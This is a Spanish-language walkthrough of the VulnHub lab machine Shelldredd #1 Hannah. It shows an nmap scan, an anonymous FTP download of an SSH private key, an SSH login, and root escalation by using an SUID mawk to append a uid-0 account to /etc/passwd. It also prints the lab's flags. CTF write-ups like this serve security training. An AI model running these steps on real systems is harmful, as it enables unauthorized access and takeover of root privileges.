[VULNHUB] Shelldreed #1 HANNAH 

Hoy vamos a hackear la maquina de Vulnhub llamada
Shelldreed #1 HANNAH. Podeis descargarla desde el siguiente enlace: 
https://www.vulnhub.com/entry/onsystem-shelldredd-1-hannah,545/


  • Video
    • 



  • Enumeration
    • 
Empezamos con un nmap para ver que puertos 
tiene abiertos.


    
~ > nmap -A -p- 192.168.1.108                                                 
                                                                               
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-08 10:58 CEST
Nmap scan report for 192.168.1.108
Host is up (0.00035s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.59
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
61000/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 59:2d:21:0c:2f:af:9d:5a:7b:3e:a4:27:aa:37:89:08 (RSA)
|   256 59:26:da:44:3b:97:d2:30:b1:9b:9b:02:74:8b:87:58 (ECDSA)
|_  256 8e:ad:10:4f:e3:3e:65:28:40:cb:5b:bf:1d:24:7f:17 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.95 seconds

    

Despues de escanear los puertos vemos que solo tiene el servicio
FTP y el SSH.
Nos conectamos al FTP usando anonymous/anonymous para ver que encontramos...


    
~ > ftp 192.168.1.108                                                         
Connected to 192.168.1.108.
220 (vsFTPd 3.0.3)
Name (192.168.1.108:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        115          4096 Aug 06 16:56 .
drwxr-xr-x    3 0        115          4096 Aug 06 16:56 ..
drwxr-xr-x    2 0        0            4096 Aug 06 16:54 .hannah
226 Directory send OK.
ftp> 
ftp> cd .hannah
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Aug 06 16:54 .
drwxr-xr-x    3 0        115          4096 Aug 06 16:56 ..
-rwxr-xr-x    1 0        0            1823 Aug 06 16:54 id_rsa
226 Directory send OK.

    

Vemos que dentro de .hannah hay un fichero id_rsa. Lo
descargamos.


    
ftp> get id_rsa
local: id_rsa remote: id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for id_rsa (1823 bytes).
226 Transfer complete.
1823 bytes received in 0.00 secs (1.6495 MB/s)

    

Tiene pinta de ser una key ssh, asi que probamos a loguearnos
como hannah usando dicha key.


    
~ > chmod 600 id_rsa
~ > ssh hannah@192.168.1.108 -i id_rsa -p 61000
The authenticity of host '[192.168.1.108]:61000 ([192.168.1.108]:61000)' can't 
be established.
ECDSA key fingerprint is SHA256:ceHZU8u3GwiQwVwrN4Ci830AmTvAmIUOlLjtVYcP2KM.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.1.108]:61000' (ECDSA) to the list of known 
hosts.
Linux ShellDredd 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep  5 09:20:42 2020 from 192.168.1.140
hannah@ShellDredd:~$

    

Estamos dentro :)


  • user.txt
    • 


    
hannah@ShellDredd:~$ ls
user.txt
hannah@ShellDredd:~$ cat user.txt
Gr3mMhbCpuwxCZorqDL3ILPn

    


  • Privilege Escalation
    • 

Exploramos el sistema para ver si vemos algun binario
SUID que pueda ayudarnos con la escalada de privilegios.


    
hannah@ShellDredd:~$ find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/cpulimit
/usr/bin/mount
/usr/bin/passwd

    

Vemos que esta "mawk" el cual podemos utilizar....
Vamos a crear un usuario en el fichero /etc/passwd con permisos
de root, con ayuda de mawk.

La password que usara nuestro usuario es "123", asi que preparamos
su hash para ponerlo en nuestro fichero.


    
~ > openssl passwd -1 -salt new 123
$1$new$p7ptkEKU1HnaHpRtzNizS1

    

Una vez tenemos la password que queremos utilizar, utilizamos mawk
para agregar al fichero /etc/passwd una linea con el usuario que 
tendra privilegios de root y que utilizaremos!


    
hannah@ShellDredd:~$ mawk -v LFILE=/etc/passwd 'BEGIN { print 
"ruut:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash" >> LFILE }'

    

Tras ejecutar el comando, ya podemos loguearnos como "ruut".


    
hannah@ShellDredd:~$ su ruut
Password:123 
root@ShellDredd:/home/hannah#

    

Y ya somos root!


  • root.txt
    • 


    
root@ShellDredd:/home/hannah# cd /root
root@ShellDredd:~# ls
root.txt
root@ShellDredd:~# cat root.txt 
yeZCB44MPH2KQwbssgTQ2Nof

    


  • End
    • 
Y con esto ya seriamos root de la maquina.